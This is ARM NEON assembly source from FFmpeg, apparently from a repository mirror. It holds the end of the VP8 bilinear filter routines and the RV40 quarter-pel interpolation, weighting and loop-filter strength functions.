vmull.u8 q10, d5, d1
vmlal.u8 q10, d3, d0
vrshrn.u16 d4, q3, #3
vrshrn.u16 d5, q8, #3
vrshrn.u16 d6, q9, #3
vrshrn.u16 d7, q10, #3
vst1.8 {q2}, [r0,:128], r1
vst1.8 {q3}, [r0,:128], r1
bgt 1b
bx lr
endfunc
function ff_put_vp8_bilin16_hv_neon, export=1
ldr r12, [sp, #4] @ mx
vdup.8 d0, r12
rsb r12, r12, #8
vdup.8 d1, r12
ldr r12, [sp, #8] @ my
vdup.8 d2, r12
rsb r12, r12, #8
vdup.8 d3, r12
ldr r12, [sp] @ h
vld1.8 {d4-d6}, [r2], r3
vext.8 q3, q2, q3, #1
vmull.u8 q8, d4, d1
vmlal.u8 q8, d6, d0
vmull.u8 q9, d5, d1
vmlal.u8 q9, d7, d0
vrshrn.u16 d4, q8, #3
vrshrn.u16 d5, q9, #3
1:
subs r12, r12, #2
vld1.8 {d18-d20},[r2], r3
vext.8 q10, q9, q10, #1
vmull.u8 q11, d18, d1
vmlal.u8 q11, d20, d0
vld1.8 {d26-d28},[r2], r3
vmull.u8 q12, d19, d1
vmlal.u8 q12, d21, d0
vext.8 q14, q13, q14, #1
vmull.u8 q8, d26, d1
vmlal.u8 q8, d28, d0
vmull.u8 q9, d27, d1
vmlal.u8 q9, d29, d0
vrshrn.u16 d6, q11, #3
vrshrn.u16 d7, q12, #3
vmull.u8 q12, d4, d3
vmlal.u8 q12, d6, d2
vmull.u8 q15, d5, d3
vmlal.u8 q15, d7, d2
vrshrn.u16 d4, q8, #3
vrshrn.u16 d5, q9, #3
vmull.u8 q10, d6, d3
vmlal.u8 q10, d4, d2
vmull.u8 q11, d7, d3
vmlal.u8 q11, d5, d2
vrshrn.u16 d24, q12, #3
vrshrn.u16 d25, q15, #3
vst1.8 {q12}, [r0,:128], r1
vrshrn.u16 d20, q10, #3
vrshrn.u16 d21, q11, #3
vst1.8 {q10}, [r0,:128], r1
bgt 1b
bx lr
endfunc
function ff_put_vp8_bilin8_h_neon, export=1
ldr r12, [sp, #4] @ mx
vdup.8 d0, r12
rsb r12, r12, #8
vdup.8 d1, r12
ldr r12, [sp] @ h
1:
subs r12, r12, #2
vld1.8 {q1}, [r2], r3
vext.8 d3, d2, d3, #1
vmull.u8 q2, d2, d1
vmlal.u8 q2, d3, d0
vld1.8 {q3}, [r2], r3
vext.8 d7, d6, d7, #1
vmull.u8 q8, d6, d1
vmlal.u8 q8, d7, d0
vrshrn.u16 d4, q2, #3
vrshrn.u16 d16, q8, #3
vst1.8 {d4}, [r0,:64], r1
vst1.8 {d16}, [r0,:64], r1
bgt 1b
bx lr
endfunc
function ff_put_vp8_bilin8_v_neon, export=1
ldr r12, [sp, #8] @ my
vdup.8 d0, r12
rsb r12, r12, #8
vdup.8 d1, r12
ldr r12, [sp] @ h
vld1.8 {d2}, [r2], r3
1:
subs r12, r12, #2
vld1.8 {d3}, [r2], r3
vmull.u8 q2, d2, d1
vmlal.u8 q2, d3, d0
vld1.8 {d2}, [r2], r3
vmull.u8 q3, d3, d1
vmlal.u8 q3, d2, d0
vrshrn.u16 d4, q2, #3
vrshrn.u16 d6, q3, #3
vst1.8 {d4}, [r0,:64], r1
vst1.8 {d6}, [r0,:64], r1
bgt 1b
bx lr
endfunc
function ff_put_vp8_bilin8_hv_neon, export=1
ldr r12, [sp, #4] @ mx
vdup.8 d0, r12
rsb r12, r12, #8
vdup.8 d1, r12
ldr r12, [sp, #8] @ my
vdup.8 d2, r12
rsb r12, r12, #8
vdup.8 d3, r12
ldr r12, [sp] @ h
vld1.8 {q2}, [r2], r3
vext.8 d5, d4, d5, #1
vmull.u8 q9, d4, d1
vmlal.u8 q9, d5, d0
vrshrn.u16 d22, q9, #3
1:
subs r12, r12, #2
vld1.8 {q3}, [r2], r3
vext.8 d7, d6, d7, #1
vmull.u8 q8, d6, d1
vmlal.u8 q8, d7, d0
vld1.8 {q2}, [r2], r3
vext.8 d5, d4, d5, #1
vmull.u8 q9, d4, d1
vmlal.u8 q9, d5, d0
vrshrn.u16 d16, q8, #3
vmull.u8 q10, d22, d3
vmlal.u8 q10, d16, d2
vrshrn.u16 d22, q9, #3
vmull.u8 q12, d16, d3
vmlal.u8 q12, d22, d2
vrshrn.u16 d20, q10, #3
vst1.8 {d20}, [r0,:64], r1
vrshrn.u16 d23, q12, #3
vst1.8 {d23}, [r0,:64], r1
bgt 1b
bx lr
endfunc
function ff_put_vp8_bilin4_h_neon, export=1
ldr r12, [sp, #4] @ mx
vdup.8 d0, r12
rsb r12, r12, #8
vdup.8 d1, r12
ldr r12, [sp] @ h
1:
subs r12, r12, #2
vld1.8 {d2}, [r2], r3
vext.8 d3, d2, d3, #1
vld1.8 {d6}, [r2], r3
vext.8 d7, d6, d7, #1
vtrn.32 q1, q3
vmull.u8 q2, d2, d1
vmlal.u8 q2, d3, d0
vrshrn.u16 d4, q2, #3
vst1.32 {d4[0]}, [r0,:32], r1
vst1.32 {d4[1]}, [r0,:32], r1
bgt 1b
bx lr
endfunc
function ff_put_vp8_bilin4_v_neon, export=1
ldr r12, [sp, #8] @ my
vdup.8 d0, r12
rsb r12, r12, #8
vdup.8 d1, r12
ldr r12, [sp] @ h
vld1.32 {d2[]}, [r2], r3
1:
vld1.32 {d3[]}, [r2]
vld1.32 {d2[1]}, [r2], r3
vld1.32 {d3[1]}, [r2], r3
vmull.u8 q2, d2, d1
vmlal.u8 q2, d3, d0
vtrn.32 d3, d2
vrshrn.u16 d4, q2, #3
vst1.32 {d4[0]}, [r0,:32], r1
vst1.32 {d4[1]}, [r0,:32], r1
subs r12, r12, #2
bgt 1b
bx lr
endfunc
function ff_put_vp8_bilin4_hv_neon, export=1
ldr r12, [sp, #4] @ mx
vdup.8 d0, r12
rsb r12, r12, #8
vdup.8 d1, r12
ldr r12, [sp, #8] @ my
vdup.8 d2, r12
rsb r12, r12, #8
vdup.8 d3, r12
ldr r12, [sp] @ h
vld1.8 {d4}, [r2], r3
vext.8 d5, d4, d4, #1
vmull.u8 q9, d4, d1
vmlal.u8 q9, d5, d0
vrshrn.u16 d22, q9, #3
1:
subs r12, r12, #2
vld1.8 {d6}, [r2], r3
vext.8 d7, d6, d6, #1
vld1.8 {d4}, [r2], r3
vext.8 d5, d4, d4, #1
vtrn.32 q3, q2
vmull.u8 q8, d6, d1
vmlal.u8 q8, d7, d0
vrshrn.u16 d16, q8, #3
vmull.u8 q10, d16, d2
vtrn.32 d22, d16
vmlal.u8 q10, d22, d3
vrev64.32 d22, d16
vrshrn.u16 d20, q10, #3
vst1.32 {d20[0]}, [r0,:32], r1
vst1.32 {d20[1]}, [r0,:32], r1
bgt 1b
bx lr
endfunc
|
Akagi201/ffmpeg-xcode
| 34,226
|
ffmpeg-3.0.2/libavcodec/arm/rv40dsp_neon.S
|
/*
* Copyright (c) 2011 Janne Grunau <janne-libav@jannau.net>
* Copyright (c) 2011 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
#include "neon.S"
.macro qpel_lowpass r0, r1, rc1, rc2, shift
vext.8 d25, \r0, \r1, #1 @ src[-1]
vext.8 d26, \r0, \r1, #4 @ src[ 2]
vext.8 d24, \r0, \r1, #5 @ src[ 3]
vaddl.u8 q9, d25, d26
vaddl.u8 q8, \r0, d24
vext.8 d27, \r0, \r1, #2 @ src[ 0]
vshl.s16 q12, q9, #2
vsub.s16 q8, q8, q9
vext.8 d28, \r0, \r1, #3 @ src[ 1]
vsub.s16 q8, q8, q12
vmlal.u8 q8, d27, \rc1
vmlal.u8 q8, d28, \rc2
vqrshrun.s16 \r0, q8, #\shift
.endm
.macro qpel_lowpass_x2 r0, r1, r2, r3, rc1, rc2, shift
vext.8 d25, \r0, \r1, #1 @ src[-1]
vext.8 d26, \r0, \r1, #4 @ src[ 2]
vext.8 d24, \r0, \r1, #5 @ src[ 3]
vaddl.u8 q9, d25, d26
vaddl.u8 q8, \r0, d24
vext.8 d29, \r0, \r1, #2 @ src[ 0]
vext.8 d28, \r0, \r1, #3 @ src[ 1]
vshl.s16 q10, q9, #2
vext.8 \r1, \r2, \r3, #1 @ src[-1]
vsub.s16 q8, q8, q9
vext.8 d22, \r2, \r3, #4 @ src[ 2]
vext.8 \r0, \r2, \r3, #5 @ src[ 3]
vaddl.u8 q13, \r1, d22
vaddl.u8 q12, \r2, \r0
vsub.s16 q8, q8, q10
vshl.s16 q9, q13, #2
vsub.s16 q12, q12, q13
vmlal.u8 q8, d29, \rc1
vmlal.u8 q8, d28, \rc2
vsub.s16 q12, q12, q9
vext.8 d26, \r2, \r3, #2 @ src[ 0]
vext.8 d27, \r2, \r3, #3 @ src[ 1]
vmlal.u8 q12, d26, \rc1
vmlal.u8 q12, d27, \rc2
vqrshrun.s16 \r0, q8, #\shift
vqrshrun.s16 \r2, q12, #\shift
.endm
.macro rv40_qpel8_h shift
function put_rv40_qpel8_h_lp_packed_s\shift\()_neon
1:
vld1.8 {q2}, [r1], r2
vld1.8 {q3}, [r1], r2
qpel_lowpass_x2 d4, d5, d6, d7, d0, d1, \shift
vst1.8 {d4}, [r12,:64]!
vst1.8 {d6}, [r12,:64]!
subs r3, r3, #2
bgt 1b
vld1.8 {q2}, [r1]
qpel_lowpass d4, d5, d0, d1, \shift
vst1.8 {d4}, [r12,:64]!
bx lr
endfunc
.endm
.macro rv40_qpel8_v shift, type
function \type\()_rv40_qpel8_v_lp_packed_s\shift\()_neon
vld1.64 {d2}, [r1,:64]!
vld1.64 {d3}, [r1,:64]!
vld1.64 {d4}, [r1,:64]!
vld1.64 {d5}, [r1,:64]!
vld1.64 {d6}, [r1,:64]!
vld1.64 {d7}, [r1,:64]!
vld1.64 {d8}, [r1,:64]!
vld1.64 {d9}, [r1,:64]!
vld1.64 {d10}, [r1,:64]!
vld1.64 {d11}, [r1,:64]!
vld1.64 {d12}, [r1,:64]!
vld1.64 {d13}, [r1,:64]!
vld1.64 {d14}, [r1,:64]!
transpose_8x8 d2, d3, d4, d5, d6, d7, d8, d9
transpose_8x8 d10, d11, d12, d13, d14, d15, d30, d31
qpel_lowpass_x2 d2, d10, d3, d11, d0, d1, \shift
qpel_lowpass_x2 d4, d12, d5, d13, d0, d1, \shift
qpel_lowpass_x2 d6, d14, d7, d15, d0, d1, \shift
qpel_lowpass_x2 d8, d30, d9, d31, d0, d1, \shift
transpose_8x8 d2, d3, d4, d5, d6, d7, d8, d9
.ifc \type,avg
vld1.64 d12, [r0,:64], r2
vld1.64 d13, [r0,:64], r2
vld1.64 d14, [r0,:64], r2
vld1.64 d15, [r0,:64], r2
vld1.64 d16, [r0,:64], r2
vld1.64 d17, [r0,:64], r2
vld1.64 d18, [r0,:64], r2
vld1.64 d19, [r0,:64], r2
sub r0, r0, r2, lsl #3
vrhadd.u8 q1, q1, q6
vrhadd.u8 q2, q2, q7
vrhadd.u8 q3, q3, q8
vrhadd.u8 q4, q4, q9
.endif
vst1.64 d2, [r0,:64], r2
vst1.64 d3, [r0,:64], r2
vst1.64 d4, [r0,:64], r2
vst1.64 d5, [r0,:64], r2
vst1.64 d6, [r0,:64], r2
vst1.64 d7, [r0,:64], r2
vst1.64 d8, [r0,:64], r2
vst1.64 d9, [r0,:64], r2
bx lr
endfunc
.endm
rv40_qpel8_h 5
rv40_qpel8_h 6
.macro rv40_qpel type
function \type\()_rv40_qpel8_h_lowpass_neon
.ifc \type,avg
mov r12, r0
.endif
1:
vld1.8 {q2}, [r1], r2
vld1.8 {q3}, [r1], r2
qpel_lowpass_x2 d4, d5, d6, d7, d0, d1, 6
.ifc \type,avg
vld1.8 {d3}, [r12,:64], r2
vld1.8 {d16}, [r12,:64], r2
vrhadd.u8 d4, d4, d3
vrhadd.u8 d6, d6, d16
.endif
vst1.8 {d4}, [r0,:64], r2
vst1.8 {d6}, [r0,:64], r2
subs r3, r3, #2
bgt 1b
bx lr
endfunc
function \type\()_rv40_qpel8_v_lowpass_neon
vld1.64 {d2}, [r1], r2
vld1.64 {d3}, [r1], r2
vld1.64 {d4}, [r1], r2
vld1.64 {d5}, [r1], r2
vld1.64 {d6}, [r1], r2
vld1.64 {d7}, [r1], r2
vld1.64 {d8}, [r1], r2
vld1.64 {d9}, [r1], r2
vld1.64 {d10}, [r1], r2
vld1.64 {d11}, [r1], r2
vld1.64 {d12}, [r1], r2
vld1.64 {d13}, [r1], r2
vld1.64 {d14}, [r1]
transpose_8x8 d2, d3, d4, d5, d6, d7, d8, d9
transpose_8x8 d10, d11, d12, d13, d14, d15, d30, d31
qpel_lowpass_x2 d2, d10, d3, d11, d0, d1, 6
qpel_lowpass_x2 d4, d12, d5, d13, d0, d1, 6
qpel_lowpass_x2 d6, d14, d7, d15, d0, d1, 6
qpel_lowpass_x2 d8, d30, d9, d31, d0, d1, 6
transpose_8x8 d2, d3, d4, d5, d6, d7, d8, d9
.ifc \type,avg
vld1.64 d12, [r0,:64], r2
vld1.64 d13, [r0,:64], r2
vld1.64 d14, [r0,:64], r2
vld1.64 d15, [r0,:64], r2
vld1.64 d16, [r0,:64], r2
vld1.64 d17, [r0,:64], r2
vld1.64 d18, [r0,:64], r2
vld1.64 d19, [r0,:64], r2
sub r0, r0, r2, lsl #3
vrhadd.u8 q1, q1, q6
vrhadd.u8 q2, q2, q7
vrhadd.u8 q3, q3, q8
vrhadd.u8 q4, q4, q9
.endif
vst1.64 d2, [r0,:64], r2
vst1.64 d3, [r0,:64], r2
vst1.64 d4, [r0,:64], r2
vst1.64 d5, [r0,:64], r2
vst1.64 d6, [r0,:64], r2
vst1.64 d7, [r0,:64], r2
vst1.64 d8, [r0,:64], r2
vst1.64 d9, [r0,:64], r2
bx lr
endfunc
rv40_qpel8_v 5, \type
rv40_qpel8_v 6, \type
function ff_\type\()_rv40_qpel8_mc10_neon, export=1
sub r1, r1, #2
mov r3, #8
vmov.i8 d0, #52
vmov.i8 d1, #20
b \type\()_rv40_qpel8_h_lowpass_neon
endfunc
function ff_\type\()_rv40_qpel8_mc30_neon, export=1
sub r1, r1, #2
mov r3, #8
vmov.i8 d0, #20
vmov.i8 d1, #52
b \type\()_rv40_qpel8_h_lowpass_neon
endfunc
function ff_\type\()_rv40_qpel8_mc01_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub r1, r1, r2, lsl #1
vmov.i8 d0, #52
vmov.i8 d1, #20
bl \type\()_rv40_qpel8_v_lowpass_neon
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc11_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8
add r12, sp, #7
bic r12, r12, #7
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #52
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
add r1, sp, #7
bic r1, r1, #7
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc21_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8
add r12, sp, #7
bic r12, r12, #7
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #20
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
add r1, sp, #7
bic r1, r1, #7
vmov.i8 d0, #52
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc31_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8
add r12, sp, #7
bic r12, r12, #7
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #20
vmov.i8 d1, #52
bl put_rv40_qpel8_h_lp_packed_s6_neon
add r1, sp, #7
bic r1, r1, #7
vswp d0, d1
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc12_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8
add r12, sp, #7
bic r12, r12, #7
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #52
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
add r1, sp, #7
bic r1, r1, #7
vmov.i8 d0, #20
bl \type\()_rv40_qpel8_v_lp_packed_s5_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc22_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8
add r12, sp, #7
bic r12, r12, #7
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #20
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
add r1, sp, #7
bic r1, r1, #7
bl \type\()_rv40_qpel8_v_lp_packed_s5_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc32_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8
add r12, sp, #7
bic r12, r12, #7
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #20
vmov.i8 d1, #52
bl put_rv40_qpel8_h_lp_packed_s6_neon
add r1, sp, #7
bic r1, r1, #7
vmov.i8 d1, #20
bl \type\()_rv40_qpel8_v_lp_packed_s5_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc03_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub r1, r1, r2, lsl #1
vmov.i8 d0, #20
vmov.i8 d1, #52
bl \type\()_rv40_qpel8_v_lowpass_neon
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc33_neon, export=1
mov r3, #8
b X(ff_\type\()_pixels8_xy2_neon)
endfunc
function ff_\type\()_rv40_qpel8_mc13_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8
add r12, sp, #7
bic r12, r12, #7
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #52
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
add r1, sp, #7
bic r1, r1, #7
vswp d0, d1
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc23_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8
add r12, sp, #7
bic r12, r12, #7
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #20
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
add r1, sp, #7
bic r1, r1, #7
vmov.i8 d1, #52
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel16_mc10_neon, export=1
vmov.i8 d0, #52
vmov.i8 d1, #20
.L\type\()_rv40_qpel16_h:
push {r1, lr}
sub r1, r1, #2
mov r3, #16
bl \type\()_rv40_qpel8_h_lowpass_neon
pop {r1, lr}
sub r0, r0, r2, lsl #4
add r0, r0, #8
add r1, r1, #6
mov r3, #16
b \type\()_rv40_qpel8_h_lowpass_neon
endfunc
function ff_\type\()_rv40_qpel16_mc30_neon, export=1
vmov.i8 d0, #20
vmov.i8 d1, #52
b .L\type\()_rv40_qpel16_h
endfunc
function ff_\type\()_rv40_qpel16_mc01_neon, export=1
vmov.i8 d0, #52
vmov.i8 d1, #20
.L\type\()_rv40_qpel16_v:
sub r1, r1, r2, lsl #1
push {r1, lr}
vpush {d8-d15}
bl \type\()_rv40_qpel8_v_lowpass_neon
sub r1, r1, r2, lsl #2
bl \type\()_rv40_qpel8_v_lowpass_neon
ldr r1, [sp, #64]
sub r0, r0, r2, lsl #4
add r0, r0, #8
add r1, r1, #8
bl \type\()_rv40_qpel8_v_lowpass_neon
sub r1, r1, r2, lsl #2
bl \type\()_rv40_qpel8_v_lowpass_neon
vpop {d8-d15}
pop {r1, pc}
endfunc
function ff_\type\()_rv40_qpel16_mc11_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #52
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
ldr r1, [sp, #416]
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
.L\type\()_rv40_qpel16_v_s6:
add r1, sp, #7
bic r1, r1, #7
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
sub r1, r1, #40
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
sub r0, r0, r2, lsl #4
add r0, r0, #8
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
sub r1, r1, #40
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
add sp, sp, #44*8
vpop {d8-d15}
pop {r1, pc}
endfunc
function ff_\type\()_rv40_qpel16_mc21_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #20
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
ldr r1, [sp, #416]
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
vmov.i8 d0, #52
b .L\type\()_rv40_qpel16_v_s6
endfunc
function ff_\type\()_rv40_qpel16_mc31_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #20
vmov.i8 d1, #52
bl put_rv40_qpel8_h_lp_packed_s6_neon
ldr r1, [sp, #416]
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
vswp d0, d1
b .L\type\()_rv40_qpel16_v_s6
endfunc
function ff_\type\()_rv40_qpel16_mc12_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #52
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
ldr r1, [sp, #416]
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
vmov.i8 d0, #20
.L\type\()_rv40_qpel16_v_s5:
add r1, sp, #7
bic r1, r1, #7
bl \type\()_rv40_qpel8_v_lp_packed_s5_neon
sub r1, r1, #40
bl \type\()_rv40_qpel8_v_lp_packed_s5_neon
sub r0, r0, r2, lsl #4
add r0, r0, #8
bl \type\()_rv40_qpel8_v_lp_packed_s5_neon
sub r1, r1, #40
bl \type\()_rv40_qpel8_v_lp_packed_s5_neon
add sp, sp, #44*8
vpop {d8-d15}
pop {r1, pc}
endfunc
function ff_\type\()_rv40_qpel16_mc22_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #20
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
ldr r1, [sp, #416]
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
b .L\type\()_rv40_qpel16_v_s5
endfunc
function ff_\type\()_rv40_qpel16_mc32_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #20
vmov.i8 d1, #52
bl put_rv40_qpel8_h_lp_packed_s6_neon
ldr r1, [sp, #416]
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
vmov.i8 d1, #20
b .L\type\()_rv40_qpel16_v_s5
endfunc
function ff_\type\()_rv40_qpel16_mc03_neon, export=1
vmov.i8 d0, #20
vmov.i8 d1, #52
b .L\type\()_rv40_qpel16_v
endfunc
function ff_\type\()_rv40_qpel16_mc13_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #52
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
ldr r1, [sp, #416]
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
vswp d0, d1
b .L\type\()_rv40_qpel16_v_s6
endfunc
function ff_\type\()_rv40_qpel16_mc23_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #20
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
ldr r1, [sp, #416]
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
vmov.i8 d1, #52
b .L\type\()_rv40_qpel16_v_s6
endfunc
function ff_\type\()_rv40_qpel16_mc33_neon, export=1
mov r3, #16
b X(ff_\type\()_pixels16_xy2_neon)
endfunc
.endm
rv40_qpel put
rv40_qpel avg
.macro rv40_weight
vmovl.u8 q8, d2
vmovl.u8 q9, d3
vmovl.u8 q10, d4
vmovl.u8 q11, d5
vmull.u16 q2, d16, d0[2]
vmull.u16 q3, d17, d0[2]
vmull.u16 q8, d18, d0[2]
vmull.u16 q9, d19, d0[2]
vmull.u16 q12, d20, d0[0]
vmull.u16 q13, d21, d0[0]
vmull.u16 q14, d22, d0[0]
vmull.u16 q15, d23, d0[0]
vshrn.i32 d4, q2, #9
vshrn.i32 d5, q3, #9
vshrn.i32 d6, q8, #9
vshrn.i32 d7, q9, #9
vshrn.i32 d16, q12, #9
vshrn.i32 d17, q13, #9
vshrn.i32 d18, q14, #9
vshrn.i32 d19, q15, #9
vadd.u16 q2, q2, q8
vadd.u16 q3, q3, q9
vrshrn.i16 d2, q2, #5
vrshrn.i16 d3, q3, #5
.endm
/* void ff_rv40_weight_func_16_neon(uint8_t *dst, uint8_t *src1, uint8_t *src2,
int w1, int w2, int stride) */
function ff_rv40_weight_func_16_neon, export=1
ldr r12, [sp]
vmov d0, r3, r12
ldr r12, [sp, #4]
mov r3, #16
1:
vld1.8 {q1}, [r1,:128], r12
vld1.8 {q2}, [r2,:128], r12
rv40_weight
vst1.8 {q1}, [r0,:128], r12
subs r3, r3, #1
bne 1b
bx lr
endfunc
/* void ff_rv40_weight_func_8_neon(uint8_t *dst, uint8_t *src1, uint8_t *src2,
int w1, int w2, int stride) */
function ff_rv40_weight_func_8_neon, export=1
ldr r12, [sp]
vmov d0, r3, r12
ldr r12, [sp, #4]
mov r3, #8
1:
vld1.8 {d2}, [r1,:64], r12
vld1.8 {d3}, [r1,:64], r12
vld1.8 {d4}, [r2,:64], r12
vld1.8 {d5}, [r2,:64], r12
rv40_weight
vst1.8 {d2}, [r0,:64], r12
vst1.8 {d3}, [r0,:64], r12
subs r3, r3, #2
bne 1b
bx lr
endfunc
function ff_rv40_h_loop_filter_strength_neon, export=1
pkhbt r2, r3, r2, lsl #18
ldr r3, [r0]
ldr_dpre r12, r0, r1
teq r3, r12
beq 1f
sub r0, r0, r1, lsl #1
vld1.32 {d4[]}, [r0,:32], r1 @ -3
vld1.32 {d0[]}, [r0,:32], r1 @ -2
vld1.32 {d4[1]}, [r0,:32], r1 @ -1
vld1.32 {d5[]}, [r0,:32], r1 @ 0
vld1.32 {d1[]}, [r0,:32], r1 @ 1
vld1.32 {d5[0]}, [r0,:32], r1 @ 2
vpaddl.u8 q8, q0 @ -2, -2, -2, -2, 1, 1, 1, 1
vpaddl.u8 q9, q2 @ -3, -3, -1, -1, 2, 2, 0, 0
vdup.32 d30, r2 @ beta2, beta << 2
vpadd.u16 d16, d16, d17 @ -2, -2, 1, 1
vpadd.u16 d18, d18, d19 @ -3, -1, 2, 0
vabd.u16 d16, d18, d16
vclt.u16 d16, d16, d30
ldrd r2, r3, [sp, #4]
vmovl.u16 q12, d16
vtrn.16 d16, d17
vshr.u32 q12, q12, #15
ldr r0, [sp]
vst1.32 {d24[1]}, [r2,:32]
vst1.32 {d25[1]}, [r3,:32]
cmp r0, #0
it eq
bxeq lr
vand d18, d16, d17
vtrn.32 d18, d19
vand d18, d18, d19
vmov.u16 r0, d18[0]
bx lr
1:
ldrd r2, r3, [sp, #4]
mov r0, #0
str r0, [r2]
str r0, [r3]
bx lr
endfunc
